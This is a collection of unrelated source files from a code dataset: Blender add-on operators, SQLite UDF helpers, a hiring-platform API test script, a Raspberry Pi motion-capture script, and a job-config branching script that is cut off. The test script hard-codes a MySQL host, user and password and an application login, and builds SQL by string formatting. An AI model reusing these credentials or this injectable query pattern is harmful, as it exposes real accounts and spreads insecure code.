NLPopupTemplatesOperator(bpy.types.Operator):\n bl_idname = \"bge_netlogic.popup_templates\"\n bl_label = \"Show Custom Node Templates\"\n bl_description = (\n 'Load the template code for custom nodes '\n 'and cells in the text editor'\n )\n bl_options = {'REGISTER', 'UNDO'}\n\n @classmethod\n def poll(cls, context):\n return True\n\n def execute(self, context):\n node_code = self.get_or_create_text_object(\"my_custom_nodes.py\")\n cell_code = self.get_or_create_text_object(\"my_custom_cells.py\")\n self.load_template(node_code, \"my_custom_nodes.txt\")\n self.load_template(cell_code, \"my_custom_cells.txt\")\n self.report({\"INFO\"}, \"Templates available in the text editor\")\n return {'FINISHED'}\n\n def load_template(self, text_object, file_name):\n import os\n this_dir = os.path.dirname(os.path.realpath(__file__))\n parent_dir = os.path.dirname(this_dir)\n templates_dir = os.path.join(parent_dir, \"templates\")\n template_file = os.path.join(templates_dir, file_name)\n text_data = \"Error Reading Template File\"\n with open(template_file, \"r\") as f:\n text_data = f.read()\n text_object.from_string(text_data)\n\n def get_or_create_text_object(self, name):\n index = bpy.data.texts.find(name)\n if index < 0:\n bpy.ops.text.new()\n result = bpy.data.texts[-1]\n result.name = name\n return result\n else:\n return bpy.data.texts[index]\n\n\n#################################################################################\n# Web Buttons\n#################################################################################\n\n\nclass NLAddonPatreonButton(bpy.types.Operator):\n bl_idname = \"bge_netlogic.donate\"\n bl_label = \"Support this Project\"\n bl_description = \"Consider supporting this Add-On\"\n\n def execute(self, context):\n webbrowser.open('https://www.buymeacoffee.com/izaz')\n return {\"FINISHED\"}\n\n\nclass NLBGEDocsButton(bpy.types.Operator):\n bl_idname = \"bge_netlogic.bge_docs\"\n bl_label = \"Engine API\"\n\n def execute(self, context):\n webbrowser.open('https://upbge.org/api')\n return {\"FINISHED\"}\n\n\nclass NLUPBGEDocsButton(bpy.types.Operator):\n bl_idname = \"bge_netlogic.upbge_docs\"\n bl_label = \"Manual\"\n\n def execute(self, context):\n webbrowser.open('https://upbge.org/manual')\n return {\"FINISHED\"}\n\n\nclass NLDocsButton(bpy.types.Operator):\n bl_idname = \"bge_netlogic.nl_docs\"\n bl_label = \"Logic Nodes Documentation\"\n\n def execute(self, context):\n webbrowser.open('https://github.com/IzaZed/Uchronian-Logic-UPBGE-Logic-Nodes/wiki')\n return {\"FINISHED\"}\n\n\nclass NLAddonGithubButton(bpy.types.Operator):\n bl_idname = \"bge_netlogic.github\"\n bl_label = \"GitHub\"\n bl_description = \"Get involved with development\"\n\n def execute(self, context):\n webbrowser.open('https://github.com/IzaZed/Uchronian-Logic-UPBGE-Logic-Nodes/issues')\n return {\"FINISHED\"}\n","sub_path":"ops/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":48140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"594886247","text":"import sqlite3\n\nfrom typing import Callable\n\nfrom numba.types import ClassType\n\nfrom .cslumba import get_sqlite_db\nfrom .sqlite import (\n sqlite3_create_function,\n scalarfunc, stepfunc, finalizefunc, valuefunc, inversefunc, destroyfunc,\n sqlite3_create_window_function,\n sqlite3_errmsg,\n SQLITE_DETERMINISTIC,\n SQLITE_UTF8,\n SQLITE_OK,\n)\nfrom .scalar import sqlite_udf\nfrom .aggregate import sqlite_udaf\n\n__all__ = (\n 'create_function',\n 'create_aggregate',\n 'sqlite_udf',\n 'sqlite_udaf',\n)\n\ndef create_function(\n con: sqlite3.Connection,\n name: str,\n num_params: int,\n func: Callable,\n deterministic: bool = False\n) -> None:\n \"\"\"Register a UDF with name `name` with the SQLite connection `con`.\n\n Parameters\n ----------\n con : sqlite3.Connection\n A connection to a SQLite database\n name : str\n The name of this function in the database, given as a UTF-8 encoded\n string\n num_params : int\n The number of arguments this function takes\n func : cfunc\n The sqlite_udf-decorated function to register\n deterministic : bool\n True if this function returns the same output given the same input.\n Most functions are deterministic.\n\n \"\"\"\n sqlite_db = get_sqlite_db(con)\n if sqlite3_create_function(\n sqlite_db,\n name.encode('utf8'),\n num_params,\n SQLITE_UTF8 | (SQLITE_DETERMINISTIC if deterministic else 0),\n None,\n scalarfunc(getattr(func, 'address')),\n stepfunc(0),\n finalizefunc(0),\n ) != SQLITE_OK:\n raise sqlite3.OperationalError(sqlite3_errmsg(sqlite_db))\n\n\ndef create_aggregate(\n con: sqlite3.Connection,\n name: str,\n num_params: int,\n aggregate_class: ClassType,\n deterministic: bool = False\n) -> None:\n \"\"\"Register an aggregate named `name` with the SQLite connection `con`.\n\n Parameters\n ----------\n con : sqlite3.Connection\n A connection to a SQLite database\n name : str\n The name of this function in the database, given as a UTF-8 encoded\n string\n num_params : int\n The number of arguments this function takes\n aggregate_class : JitClass\n This class must be decorated with @sqlite_udaf for this function to\n work. If this class has `value` and `inverse` attributes, it will be\n registered as a window function. Window functions can also be used as\n standard aggregate functions.\n deterministic : bool\n True if this function returns the same output given the same input.\n Most functions are deterministic.\n\n \"\"\"\n namebytes = name.encode('utf8')\n sqlite_db = get_sqlite_db(con)\n if hasattr(aggregate_class, 'value') and hasattr(\n aggregate_class, 'inverse'\n ):\n rc = sqlite3_create_window_function(\n sqlite_db,\n namebytes,\n num_params,\n SQLITE_UTF8 | (SQLITE_DETERMINISTIC if deterministic else 0),\n None,\n stepfunc(aggregate_class.step.address),\n finalizefunc(aggregate_class.finalize.address),\n valuefunc(aggregate_class.value.address),\n inversefunc(aggregate_class.inverse.address),\n destroyfunc(0),\n )\n else:\n rc = sqlite3_create_function(\n sqlite_db,\n namebytes,\n num_params,\n SQLITE_UTF8 | (SQLITE_DETERMINISTIC if deterministic else 0),\n None,\n scalarfunc(0),\n stepfunc(aggregate_class.step.address),\n finalizefunc(aggregate_class.finalize.address),\n )\n if rc != SQLITE_OK:\n raise sqlite3.OperationalError(sqlite3_errmsg(sqlite_db))\n","sub_path":"slumba/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"264303639","text":"import ast\nimport math\nimport dateutil.parser\nimport requests\nimport json\nimport copy\nimport mysql\nimport xlrd\nimport xlwt\nimport datetime\nfrom mysql import connector\nclass Excel_Data:\n def __init__(self):\n # self.job_filters = ['JobIds','Name','NoOfOpeningsFrom','NoOfOpeningsTo','RoleIds','OwnerIds','LocationIds','IsJobUtilized',\n # 'DepartmentIds','JobCodeIds','SalaryStart','SalaryEnd','ExperienceStart','ExperienceEnd','IsJobPosted',\n # 'SkillIds']\n\n self.xl_json_request = []\n self.xl_excepted_offer_id = []\n self.rownum = 1\n\n self.boundary_range = [1270554,1275033,1275038,1275048,1275035,1275045,1275039,1275042,1275041,1275040,1275037,\n 1275036,1275034,1275033,1275047,1275046,1275044,1275043,1275052,1275051,1275050,1275049,\n 1274203,1274015,1269995,1269912,1265771,1265774,1265771,1275037]\n\n self.__style0 = xlwt.easyxf('font: name Times New Roman, color-index black, bold on')\n self.__style1 = xlwt.easyxf('font: name Times New Roman, color-index black, bold off')\n self.__style2 = xlwt.easyxf('font: name Times New Roman, color-index red, bold on')\n self.__style3 = xlwt.easyxf('font: name Times New Roman, color-index green, bold on')\n\n self.wb_result = xlwt.Workbook()\n self.ws = self.wb_result.add_sheet('Offer Search Result')\n self.ws.write(0, 0, 'Request', self.__style0)\n self.ws.write(0, 1, 'API Count', self.__style0)\n self.ws.write(0, 2, 'DB Count', self.__style0)\n self.ws.write(0, 3, 'Expected Offer Id\\'s', self.__style0)\n self.ws.write(0, 4, 'Not Matched Id\\'s', self.__style0)\n\n self.conn = mysql.connector.connect(host='35.154.36.218',\n database='appserver_core',\n user='hireprouser',\n password='tech@123')\n self.cursor = self.conn.cursor()\n # self.tenant_id = 1782\n now = datetime.datetime.now()\n self.__current_DateTime = now.strftime(\"%d-%m-%Y\")\n\n header = {\"content-type\": \"application/json\"}\n data = {\"LoginName\": \"admin\", \"Password\": \"Automation@123\", \"TenantAlias\": \"rpoautomation\", \"UserName\": \"admin\"}\n response = requests.post(\"https://amsin.hirepro.in/py/common/user/login_user/\", headers=header,\n data=json.dumps(data), verify=True)\n self.TokenVal = response.json()\n print (self.TokenVal.get(\"Token\"))\n\n wb = xlrd.open_workbook(\"C:\\PythonAutomation\\InputForJobOfferResumeSearch\\OfferSearchInput.xls\")\n sheetname = wb.sheet_names() # Reading XLS Sheet names\n print(sheetname)\n sh1 = wb.sheet_by_index(0) #\n i = 1\n for i in range(1, sh1.nrows):\n rownum = (i)\n rows = sh1.row_values(rownum)\n self.xl_json_request.append(rows[0])\n self.xl_excepted_offer_id.append(str(rows[1]))\n\n local = self.xl_excepted_offer_id\n print (type(local))\n length = len(self.xl_excepted_offer_id)\n self.new_local = []\n\n for i in range(0, length):\n j = [int(float(b)) for b in local[i].split(',')]\n self.new_local.append(j)\n self.xl_expected = self.new_local\n\n def json_data(self):\n r = requests.post(\"https://amsin.hirepro.in/py/rpo/get_all_offers/\", headers=self.headers,\n data=json.dumps(self.data, default=str), verify=False)\n print (self.data)\n # print r.content\n resp_dict = json.loads(r.content)\n self.status = resp_dict['status']\n print (resp_dict)\n\n if self.status == 'OK':\n self.count = resp_dict['TotalItemCount']\n self.total_pages1 = float(self.count)/200\n self.total_pages = math.ceil(self.total_pages1)\n self.total_pages = int(self.total_pages)\n\n # print self.count\n else:\n self.count = \"400000000000000\"\n # print self.count\n\n def json_data_iteration(self, data, iter):\n iter += 1\n self.actual_ids = []\n for i in range(1, iter):\n self.data[\"PagingCriteria\"][\"PageNo\"] = i\n r = requests.post(\"https://amsin.hirepro.in/py/rpo/get_all_offers/\", headers=self.headers,\n data=json.dumps(data, default=str), verify=False)\n resp_dict = json.loads(r.content)\n # print resp_dict\n for element in resp_dict[\"Offers\"]:\n self.actual_ids.append(element[\"CandidateId\"])\n # print element1\n # print len(self.actual_ids)\n # print self.actual_ids\n\n def all(self):\n tot_len = len(self.xl_json_request)\n for i in range(0, tot_len):\n print (\"Iteration Count :- %s \" % i)\n # self.xl_request = ast.literal_eval(self.xl_json_request[i])\n self.xl_request= json.loads(self.xl_json_request[i])\n self.xl_request1 = copy.deepcopy(self.xl_request)\n\n if self.xl_request.get(\"CandidateId\"):\n self.xl_request[\"CandidateId\"] = self.boundary_range\n # print self.xl_request\n else:\n val = [(\"CandidateId\", self.boundary_range)]\n id_filter = dict(val)\n self.xl_request.update(id_filter)\n # print self.xl_request\n # self.ws.write(self.rownum, 0, str(self.xl_request1))\n # all_keys = self.xl_request.keys()\n\n self.headers = {\"content-type\": \"application/json\", \"X-AUTH-TOKEN\": self.TokenVal.get(\"Token\")}\n self.data = {\"PagingCriteria\":{\"MaxResults\":200,\"PageNo\":1},\"GetAllOffersOption\":\"2\",\"Filters\":self.xl_request}\n print (self.data)\n self.json_data()\n self.total_api_count = self.count\n if self.count != \"400000000000000\":\n self.data[\"PagingCriteria\"] = {\"IsRefresh\": False, \"MaxResults\": 200, \"PageNo\": 1, \"ObjectState\": 0}\n # print self.data\n #print (self.total_pages)\n self.json_data_iteration(self.data, self.total_pages)\n # print self.xl_expected[i]\n # print type(self.xl_expected[i])\n # print self.actual_ids\n # print type(self.actual_ids)\n self.mismatched_id = set(self.xl_expected[i]) - set(self.actual_ids)\n # print self.mismatched_id\n\n self.Query_Generation()\n\n expected_id = str(self.xl_expected[i])\n expected_id = expected_id.strip('[]')\n mismatched_id = str(list(self.mismatched_id))\n mismatched_id = mismatched_id.strip('[]')\n\n self.ws.write(self.rownum, 0, str(self.xl_request1))\n if self.total_api_count == self.Query_Result1:\n self.ws.write(self.rownum, 1, self.total_api_count, self.__style3)\n self.ws.write(self.rownum, 2, self.Query_Result1, self.__style3)\n self.ws.write(self.rownum, 3, expected_id, self.__style3)\n self.ws.write(self.rownum, 4, mismatched_id, self.__style2)\n\n elif self.total_api_count == '400000000000000':\n print (\"API Failed\")\n self.ws.write(self.rownum, 1, \"API Failed\", self.__style2)\n self.ws.write(self.rownum, 2, self.Query_Result1, self.__style2)\n self.ws.write(self.rownum, 3, expected_id, self.__style3)\n self.ws.write(self.rownum, 4, \"API Failed\", self.__style2)\n else:\n print (\"this is else part \\ n\")\n self.ws.write(self.rownum, 1, self.total_api_count, self.__style2)\n self.ws.write(self.rownum, 2, self.Query_Result1, self.__style2)\n self.ws.write(self.rownum, 3, expected_id, self.__style3)\n self.ws.write(self.rownum, 4, mismatched_id, self.__style2)\n self.wb_result.save(\n 'C:\\PythonAutomation\\OfferSearchResults/'\n + self.__current_DateTime + '_Combined_Offer_Search.xls')\n # print statusCode, \" -- \", b\n self.rownum = self.rownum + 1\n\n\n\n def Query_Generation(self):\n select_str = \"select count(distinct(ap.id)) from applicant_statuss ap \" \\\n \"inner join candidates c on c.id = ap.candidate_id \" \\\n \"inner join jobs j on j.id = ap.job_id \" \\\n \"inner join resume_statuss stat on stat.id=ap.current_status_id \" \\\n \"inner join resume_statuss stag on stag.id=stat.resumestatus_id \" \\\n \"left join offers o on o.id = ap.offer_id \"\n a = self.xl_request.get(\"CandidateId\")\n values = ','.join(str(v) for v in a)\n where_str = \"ap.tenant_id=1793 and stag.base_name='Offer'\"\n\n\n if self.xl_request.get(\"CandidateName\"):\n where_str += \" and c.candidate_name like '%{}%' \".format(self.xl_request.get(\"CandidateName\"))\n\n if self.xl_request.get(\"JobLocationIds\"):\n where_str += \" and j.location_id ={} \".format(self.xl_request.get(\"JobLocationIds\")[0])\n if self.xl_request.get(\"SourceIds\"):\n where_str += \" and c.original_source_id ={} \".format(self.xl_request.get(\"SourceIds\")[0])\n if self.xl_request.get(\"DepartmentId\"):\n where_str += \" and j.department_id ={} \".format(self.xl_request.get(\"DepartmentId\"))\n if self.xl_request.get(\"JobIds\"):\n a = self.xl_request.get(\"JobIds\")\n values = ','.join(str(v) for v in a)\n where_str += \" and j.id in(%s) \" % values\n if self.xl_request.get(\"JoiningDateFrom\") and self.xl_request.get(\"JoiningDateTill\"):\n joining_date_from = self.xl_request.get(\"JoiningDateFrom\")\n joining_date_till = self.xl_request.get(\"JoiningDateTill\")\n where_str += \" and o.date_of_joining between '%s' and '%s' \" % (joining_date_from, joining_date_till)\n if self.xl_request.get(\"ModifiedBy\"):\n where_str += \" and o.modified_by ={} \".format(self.xl_request.get(\"ModifiedBy\"))\n if self.xl_request.get(\"OfferCreatedFrom\") and self.xl_request.get(\"OfferCreatedTill\"):\n offer_created_from = self.xl_request.get(\"OfferCreatedFrom\")\n offer_created_till = self.xl_request.get(\"OfferCreatedTill\")\n where_str += \" and o.created_on between '%s' and '%s' \" % (offer_created_from, offer_created_till)\n if self.xl_request.get(\"StageId\"):\n where_str += \" and stag.id ={} \".format(self.xl_request.get(\"StageId\"))\n if self.xl_request.get(\"StatusIds\"):\n a = self.xl_request.get(\"StatusIds\")\n values = ','.join(str(v) for v in a)\n where_str += \" and stat.id in(%s) \" % values\n\n # if self.xl_request.get(\"StatusIds\"):\n # where_str += \" and stat.id ={} \".format(self.xl_request.get(\"StatusIds\")[0])\n\n final_qur = \"\"\n if where_str:\n final_qur = select_str + \" where \" + where_str\n self.query = final_qur\n if final_qur:\n try:\n self.cursor.execute(final_qur)\n Query_Result = self.cursor.fetchone()\n print (Query_Result)\n print (final_qur)\n self.Query_Result1 = Query_Result[0]\n except Exception as e:\n print (e)\n\n\n\n # def date_converter(self, input_date):\n # converted_utc_date = dateutil.parser.parse(input_date)\n # converted_local_date = converted_utc_date.astimezone(dateutil.tz.tzlocal()).replace(tzinfo=None)\n # date = converted_local_date.strftime(\"%Y-%m-%d\")\n # return date\n\nprint (\"Offer Search Script Started\")\nxlob = Excel_Data()\nxlob.all()\nprint (\"Completed Successfully \")","sub_path":"RPO/TestScripts/TestScripts/DummyScripts/OfferSearch.py","file_name":"OfferSearch.py","file_ext":"py","file_size_in_byte":11924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"36889375","text":"from django import forms\nfrom scrum_board.models import Task\n\n\nclass TaskForm(forms.ModelForm):\n \"\"\"\n Forma que procesa la creacion y edicion de un Task\n \"\"\"\n\n\n def __init__(self,*args,**kwargs):\n\n try:\n\n self.sprint = kwargs.pop('sprint')\n\n except:\n\n self.sprint = None\n\n super(TaskForm, self).__init__(*args, **kwargs)\n\n\n def save(self):\n\n task = super(TaskForm, self).save(commit = False)\n\n if task.pk:\n\n task.save()\n\n else:\n\n task.sprint = self.sprint\n task.save()\n return task\n\n class Meta:\n model = Task\n fields = ['name', 'type', 'description', 'status', 'due_date']\n\nclass CreateTaskForm(TaskForm):\n\n\n class Meta:\n model = Task\n fields = ['name', 'type', 'description', 'due_date']\n","sub_path":"scrum/scrum_board/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"378055787","text":"from picamera import PiCamera\nfrom time import sleep\nfrom PIL import Image, ImageOps\nimport numpy as np\nimport os\nfrom datetime import datetime\ncycle = 0\ntry: \n while True:\n camera = PiCamera()\n camera.resolution = (800,600)\n camera.rotation = 180\n # camera.start_preview()\n sleep(0.5)\n camera.capture('/home/pi/Desktop/img1.jpg')\n sleep(0.2)\n camera.capture('/home/pi/Desktop/motion.jpg')\n # camera.stop_preview()\n camera.close()\n\n img1 = Image.open('/home/pi/Desktop/img1.jpg')\n img2 = Image.open('/home/pi/Desktop/motion.jpg')\n\n img1_gray = ImageOps.grayscale(img1)\n img2_gray = ImageOps.grayscale(img2)\n\n img1_resized = img1_gray.resize((25,25))\n img2_resized = img2_gray.resize((25,25))\n\n buffer1 = np.asarray(img1_resized)\n buffer2 = np.asarray(img2_resized)\n\n img1_gray = buffer1.flatten()\n img2_gray = buffer2.flatten()\n\n images = zip(img1_gray, img2_gray)\n\n diff = 0\n\n for pixel in images:\n px1, px2 = pixel\n delta = abs(int(px1)-int(px2))\n if delta > 5:\n diff += 1\n if (cycle % 99 == 0):\n print('cycle = ', cycle)\n if (cycle == 999999):\n cycle = 0\n now = datetime.now()\n string_time = now.strftime(\"%d/%m/%Y, %H:%M:%S\")\n print('monitoring', string_time)\n if diff > 50:\n print('motion detected: ', diff, '\\n Uploading...')\n now = datetime.now()\n string_time = now.strftime(\"%d/%m/%Y, %H:%M:%S\")\n print('motion detected at: ', string_time)\n os.system('scp /home/pi/Desktop/motion.jpg ed@178.79.168.149:/home/ed/imgs/motion/motion.jpg')\n sleep(10)\n print('monitoring', string_time)\n cycle += 1\nexcept KeyboardInterrupt:\n print('end')\n camera.close()\n","sub_path":"imgCap.py","file_name":"imgCap.py","file_ext":"py","file_size_in_byte":2115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"488135844","text":"import sys\n\npath = sys.argv[1]\nnew_path = sys.argv[2]\n\narq = open(path, \"r\")\n\nsep = \"\\t\"\n\nheader = arq.readline()\nlines = arq.readlines()\narq.close()\n\ndict_keydown_line = {}\n\nfor line in lines:\n\tline_split = line.replace(\"\\n\", \"\").split(\"\\t\")\n\tkeyDown = line_split[4]\n\tdict_keydown_line[keyDown] = line\n\nsorted_keydown = dict_keydown_line.keys()\n\nsorted_keydown.sort()\n\npair_data = {}\n\nlast_line = lines[0].replace(\"\\n\", \"\").split(\"\\t\")\n\nfor line in lines[1:]:\n\tline_split = line.replace(\"\\n\", \"\").split(\"\\t\")\n\t#print line_split\n\tattempt_id = line_split[0]\n\temail = line_split[1]\n\tattempt_date = line_split[2]\n\tsource = line_split[3]\n\tkeyDown = line_split[4]\n\tkeyUp = line_split[5]\n\tkeyValue = line_split[6]\n\tkeyCode = line_split[7]\n\n\t\n\tlast_keyValue = last_line[6]\n\tlast_attempt_id = last_line[0]\n\tlast_source = last_line[3]\n\n\t#check if the the two consecutive keys are in the same session and the same text field\n\tif( (last_attempt_id == attempt_id) and (last_source == source) ):\n\t\t\n\t\tif( not (last_keyValue, keyValue) in pair_data.keys()):\n\t\t\tpair_data[(last_keyValue, keyValue)] = 1\n\t\telse:\n\t\t\tpair_data[(last_keyValue, keyValue)] = pair_data[(last_keyValue, keyValue)] + 1\n\n\tlast_line = line_split\n\narq = open(new_path, \"w\")\n\narq.write(\"key_1st\" + sep + \"key_2nd\" + sep + \"occurrence\\n\")\n\nfor i in pair_data.keys():\n\tarq.write(i[0] + sep + i[1] + sep + str(pair_data[i]) + \"\\n\")\n\narq.close()","sub_path":"analysis/preprocessing/common_letter_pairs.py","file_name":"common_letter_pairs.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"486405876","text":"import jetson.inference\nimport jetson.utils\n\nnet = jetson.inference.detectNet(\"ssd-mobilenet-v2\", threshold=0.5)\ncamera = jetson.utils.videoSource(\"csi://0\")\ndisplay = jetson.utils.videoOutput(\"display://0\")\n\nwhile display.IsStreaming():\n\timg= camera.Capture()\n\tdetections = net.Detect(img)\n\tdisplay.Render(img)\n\tdisplay.SetStatus(\"Object Detection | Networks{:.0f} FPS\".format(net.GetNetworkFPS()))\n\t","sub_path":"Eye Tracking /Code/Resources/my-detection.py","file_name":"my-detection.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"366314998","text":"# SPDX-License-Identifier: EPL-1.0\n##############################################################################\n# Copyright (c) 2020 Thanh Ha\n#\n# All rights reserved. This program and the accompanying materials\n# are made available under the terms of the Eclipse Public License v1.0\n# which accompanies this distribution, and is available at\n# http://www.eclipse.org/legal/epl-v10.html\n#\n##############################################################################\n\"\"\"Script for cutting new jobs when branching a new stable release.\"\"\"\n\nimport argparse\nfrom argparse import RawTextHelpFormatter\nimport copy\nimport fileinput\nimport os\nimport shutil\nimport sys\n\ntry:\n import ruamel.yaml\nexcept ModuleNotFoundError:\n print(\"ERROR: This script requires the package 'ruamel.yaml', please install it.\")\n print(\n \"If ruamel.yaml is not available in your system's package manager you\"\n \" can install from PyPi with:\"\n )\n print(\"\")\n print(\" pip install --user ruamel.yaml\")\n sys.exit(1)\n\nyaml = ruamel.yaml.YAML()\nyaml.allow_duplicate_keys = True\nyaml.preserve_quotes = True\n\ndefault_branch = \"master\" # This is the primary dev branch of the project\n\n\ndef create_and_update_project_jobs(\n release_on_stable_branch, release_on_current_branch, job_dir\n):\n \"\"\"Create and update project build jobs for the current and next dev release.\n\n Project jobs are jobs defined in the project.yaml that have the same name\n the directory they are in.\n\n Only updates projects where the top project configuration has a name that\n is equivalent to the current release. For example project name\n \"aaa-sulfur\" would have a release that matches what was passed to\n release_on_stable_branch.\n \"\"\"\n for directory in filter(\n lambda x: os.path.isdir(os.path.join(job_dir, x)), os.listdir(job_dir)\n ):\n try:\n with open(\n os.path.join(job_dir, directory, \"{}.yaml\".format(directory)), \"r\"\n ) as f:\n data = yaml.load(f)\n\n # Only create new jobs if the top level project name matches\n # release_on_stable_branch variable\n if not data[0][\"project\"][\"name\"] == \"{}-{}\".format(\n directory, release_on_stable_branch\n ):\n continue\n\n # Create a new job for the next release on the default_branch\n new_job = copy.deepcopy(data[0])\n new_job[\"project\"][\"name\"] = \"{}-{}\".format(\n directory, release_on_current_branch\n )\n new_job[\"project\"][\"branch\"] = default_branch\n new_job[\"project\"][\"stream\"] = \"{}\".format(release_on_current_branch)\n\n # Update exiting job for the new stable branch\n data[0][\"project\"][\"branch\"] = \"stable/{}\".format(\n release_on_stable_branch\n )\n\n data.insert(0, new_job)\n\n with open(\n os.path.join(job_dir, directory, \"{}.yaml\".format(directory)), \"w\"\n ) as f:\n stream = ruamel.yaml.round_trip_dump(data)\n f.write(\"---\\n\")\n f.write(stream)\n except FileNotFoundError: # If project.yaml file does not exist we can skip\n pass\n\n\ndef update_job_streams(release_on_stable_branch, release_on_current_branch, job_dir):\n \"\"\"Update projects that have a stream variable that is a list.\n\n If a stream variable is a list that means the project likely has multiple\n maintainance branches supported.\n\n This function also does not support {project}.yaml files as parsing those\n are handled by other functions in this script.\n\n Only updates projects where the top stream in the list is equivalent to the\n current release. For example stream \"sulfur\" would have a release that\n matches what was passed to release_on_stable_branch.\n \"\"\"\n for directory in filter(\n lambda d: os.path.isdir(os.path.join(job_dir, d)), os.listdir(job_dir)\n ):\n for job_file in filter(\n lambda f: os.path.isfile(os.path.join(job_dir, directory, f)),\n os.listdir(os.path.join(job_dir, directory)),\n ):\n\n # Projects may have non-yaml files in their repos so ignore them.\n if not job_file.endswith(\".yaml\"):\n continue\n\n # Ignore project.yaml files as they are not supported by this function.\n if job_file == \"{}.yaml\".format(directory):\n continue\n\n file_changed = False\n\n with open(os.path.join(job_dir, directory, job_file), \"r\") as f:\n data = yaml.load(f)\n\n for project in data:\n streams = project.get(\"project\", {}).get(\"stream\", None)\n\n if not isinstance(streams, list): # We only support lists streams\n continue\n\n # Skip if the stream does not match\n # release_on_stable_branch in the first item\n if not streams[0].get(release_on_stable_branch, None):\n continue\n\n # Create the next release stream\n new_stream = {}\n new_stream[release_on_current_branch] = copy.deepcopy(\n streams[0].get(release_on_stable_branch)\n )\n\n # Update the previous release stream branch to\n # stable/{stream} instead of default_branch\n streams[0][release_on_stable_branch][\"branch\"] = \"stable/{}\".format(\n release_on_stable_branch\n )\n\n streams.insert(0, new_stream)\n file_changed = True\n\n # Because we are looping every file we only want to save if we made changes.\n if file_changed:\n with open(os.path.join(job_dir, directory, job_file), \"w\") as f:\n stream = ruamel.yaml.round_trip_dump(data)\n f.write(\"---\\n\")\n f.write(stream)\n\n\ndef update_integration_csit_list(\n release_on_stable_branch, release_on_current_branch, job_dir\n):\n \"\"\"Update csit-*-list variables and files integration-test-jobs.yaml.\"\"\"\n\n class Generic:\n def __init__(self, tag, value, style=None):\n self._value = value\n self._tag = tag\n self._style = style\n\n class GenericScalar(Generic):\n @classmethod\n def to_yaml(self, representer, node):\n return representer.represent_scalar(node._tag, node._value)\n\n @staticmethod\n def construct(constructor, node):\n return constructor.construct_scalar(node)\n\n def default_constructor(constructor, tag_suffix, node):\n generic = {ruamel.yaml.ScalarNode: GenericScalar,}.get( # noqa\n type(node)\n )\n if generic is None:\n raise NotImplementedError(\"Node: \" + str(type(node)))\n style = getattr(node, \"style\", None)\n instance = generic.__new__(generic)\n yield instance\n state = generic.construct(constructor, node)\n instance.__init__(tag_suffix, state, style=style)\n\n ruamel.yaml.add_multi_constructor(\n \"\", default_constructor, Loader=ruamel.yaml.SafeLoader\n )\n yaml.register_class(GenericScalar)\n\n integration_test_jobs_yaml = os.path.join(\n job_dir, \"integration\", \"integration-test-jobs.yaml\"\n )\n\n with open(integration_test_jobs_yaml, \"r\") as f:\n data = yaml.load(f)\n\n for project in data:\n # Skip items that are not of \"project\" type\n if not project.get(\"project\"):\n continue\n\n streams = project.get(\"project\", {}).get(\"stream\", None)\n\n # Skip projects that do not have a stream configured\n if not isinstance(streams, list): # We only support lists streams\n continue\n\n # Skip if the stream does not match\n # release_on_current_branch in the first item\n if not streams[0].get(release_on_current_branch, None):\n continue\n\n # Update csit-list parameters for next release\n if streams[0][release_on_current_branch].get(\"csit-list\"):\n update_stream = streams[0][release_on_current_branch]\n update_stream[\"csit-list\"] = GenericScalar(\n \"!include:\", \"csit-jobs-{}.lst\".format(release_on_current_branch)\n )\n\n # Update csit-mri-list parameters for next release\n if streams[0][release_on_current_branch].get(\"csit-mri-list\"):\n update_stream = streams[0][release_on_current_branch]\n update_stream[\"csit-mri-list\"] = \"{{csit-mri-list-{}}}\".format(\n release_on_current_branch\n )\n\n # Update csit-weekly-list parameters for next release\n if streams[0][release_on_current_branch].get(\"csit-weekly-list\"):\n update_stream = streams[0][release_on_current_branch]\n update_stream[\"csit-weekly-list\"] = \"{{csit-weekly-list-{}}}\".format(\n release_on_current_branch\n )\n\n # Update csit-sanity-list parameters for next release\n if streams[0][release_on_current_branch].get(\"csit-sanity-list\"):\n update_stream = streams[0][release_on_current_branch]\n update_stream[\"csit-sanity-list\"] = \"{{csit-sanity-list-{}}}\".format(\n release_on_current_branch\n )\n\n with open(integration_test_jobs_yaml, \"w\") as f:\n stream = ruamel.yaml.round_trip_dump(data)\n f.write(\"---\\n\")\n f.write(stream)\n\n # Update the csit-*-list variables in defaults.yaml\n\n defaults_yaml = os.path.join(job_dir, \"defaults.yaml\")\n\n with open(defaults_yaml, \"r\") as f:\n data = yaml.load(f)\n\n # Add next release csit-mri-list-RELEASE\n new_csit_mri_list = copy.deepcopy(\n data[0][\"defaults\"].get(\"csit-mri-list-{}\".format(release_on_stable_branch))\n )\n data[0][\"defaults\"][\n \"csit-mri-list-{}\".format(release_on_current_branch)\n ] = new_csit_mri_list.replace(\n release_on_stable_branch, release_on_current_branch\n )\n\n # Add next release csit-mri-list-RELEASE\n new_csit_mri_list = copy.deepcopy(\n data[0][\"defaults\"].get(\"csit-mri-list-{}\".format(release_on_stable_branch))\n )\n data[0][\"defaults\"][\n \"csit-mri-list-{}\".format(release_on_current_branch)\n ] = new_csit_mri_list.replace(\n release_on_stable_branch, release_on_current_branch\n )\n\n # Add next release csit-weekly-list-RELEASE\n new_csit_mri_list = copy.deepcopy(\n data[0][\"defaults\"].get(\n \"csit-weekly-list-{}\".format(release_on_stable_branch)\n )\n )\n data[0][\"defaults\"][\n \"csit-weekly-list-{}\".format(release_on_current_branch)\n ] = new_csit_mri_list.replace(\n release_on_stable_branch, release_on_current_branch\n )\n\n # Add next release csit-sanity-list-RELEASE\n new_csit_mri_list = copy.deepcopy(\n data[0][\"defaults\"].get(\n \"csit-sanity-list-{}\".format(release_on_stable_branch)\n )\n )\n data[0][\"defaults\"][\n \"csit-sanity-list-{}\".format(release_on_current_branch)\n ] = 